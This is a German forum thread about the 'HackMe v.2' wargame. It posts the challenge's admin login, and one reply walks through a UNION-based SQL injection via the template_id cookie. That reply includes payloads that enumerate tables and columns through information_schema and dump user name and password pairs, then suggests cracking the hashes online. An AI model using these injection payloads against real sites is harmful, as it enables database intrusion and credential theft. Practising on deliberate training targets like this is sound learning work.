[AdminDaten]HackMe v.2 [Hacked]

Remix

Remix

0
Hey Community,

Ich habe mich mit HackMe v.2 Beschäftigt und habe nun die Admin Daten herausgefunden !!!

Website: HackMe v.2

AdminDaten

Username : Peter
Passwort: jonny

Ich hoffe damit hab ich euch geholfen!

Ein Like wäre toll :D

L.G. Remix
 
Zuletzt bearbeitet:
Glaubst du ernsthaft, dass du Likes bekommst, wenn du anderen den Spass am HackMe verdirbst? Abgesehen davon bist du als Fame-Hunter hier falsch.
 
Ich verderbe niemandem den Spass !

Wers selber versuchen will kanns doch ich zwinge niemanden die Admin Daten zu benutzen oder gar anzusehen!!!
 
Wo ich gerade den Thread sehe und da ich sowas echt selten mache:
Wie löst man das denn überhaupt? Das die Zeile "Loadet Template:" über eine SQL DB geladen wird und das von dem Wert des Cookies mit Namen template_id abhängig ist, habe ich schon verstanden. Dann gibts z.B. den Fehler "Unknown column 'name' in 'where clause'", aber wie ich jetzt die richtige Spalte herausfinde oder gar den Wert des Cookies so setze, dass ich eine ganze Tabelle herausbekomme, weiß ich nicht. Vielleicht hilft mir mal jemand leicht auf die Sprünge ;)
 
Hab mir das ganze gerade mal angeschaut.

Ein Beispielhafter (und definitiv verbesserungsfähiger ;)) weg wäre der folgende:
# Welche Tabellen gibt es in der aktuellen Datenbank ?
> template_id=-1 union all select group_concat(table_name) from information_schema.tables where table_schema=database()
< Loadet Template: games,hacker,matrizen,taktik,templates,user

# 'user' hört sich doch interessant an. Welche Spalten hat die Tabelle ?
> template_id=-1 union all select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name = CHAR(117, 115, 101, 114)
< Loadet Template: uid,name,passwort

# Gebe eine user/passwort Kombination aus. Um mehrere zu erhalten einfach die 0 bei Limit erhöhen.
> template_id=-1 union all select concat(name, 0x3a ,passwort) from user limit 0,1
< Loadet Template: Do it yourself...


# Der/die hashes müssen nun natürlich noch geknackt werden. Bei den meisten (einfacheren) Wargames sind die hashes idR. ungesalzen und schon in den meisten größeren (frei zugänglichen) "Hash-Cracker-Datenbanken" enhalten.
 
Zuletzt bearbeitet:
Sleepprogger hat gesagt.:
Ein Beispielhafter (und definitiv verbesserungsfähiger ;)) weg wäre der folgende:
Zum Vergrößern anklicken....
Bist ja ein richtiger Schatz :D. Vielen Dank.

Die Grundidee hatte ich vom Prinzip her nur an der Ausführung scheiterte es, weil ich keine Ahnung habe/hatte wie ich mir die vorhandenen Tabellen und Spalten anzeigen lassen kann, deswegen sagte ich auch ich mache das wirklich so gut wie nie ;).

Kurze Anmerkung:
> template_id=-1 union all select concat(name, 0x3a ,password) from user limit 0,1

Da haste dich verschrieben. Muss natürlich "passwort" heißen ;).

Hab dann mal das Passwort vom andy online cracken lassen und der Login funktionierte dann auch :).
 
Also ich "hacke" so etwas immer durch Lösung googlen. Was soll ich mir die Mühe machen eine absichtlich versteckte Pseudo-"Lücke" zu finden, die zum Lernfortschritt 0 beiträgt und mit Realsituationen so viel zu tun hat, wie Super Mario mit dem Handwerk eines Klempners?
 
+++ATH0 hat gesagt.:
Was soll ich mir die Mühe machen eine absichtlich versteckte Pseudo-"Lücke" zu finden, die zum Lernfortschritt 0 beiträgt und mit Realsituationen so viel zu tun hat, wie Super Mario mit dem Handwerk eines Klempners?
Zum Vergrößern anklicken....

Naja, wenn man SQLi lernen will ist dieses HackMe doch völlig OK. Ich will hier keine Grundsatzdiskussion starten, aber der wesentliche Sinn und Zweck ist doch einfach der Spaß an der Sache oder etwa nicht? Überspitzt gesagt braucht man auch kein PC Spiel mehr zu zocken, weil die Story kannste dir auch eben bei YouTube reinziehen oder in Textform bei Wikipedia. Lernen tust du dabei nichts und weiter bringen tut es dich auch nicht in deinem Leben, also wozu die Mühe machen und es spielen? Und Mario gewinnt am Ende doch eh immer ;)
 
Um antworten zu können musst du eingeloggt sein.
Zurück
Oben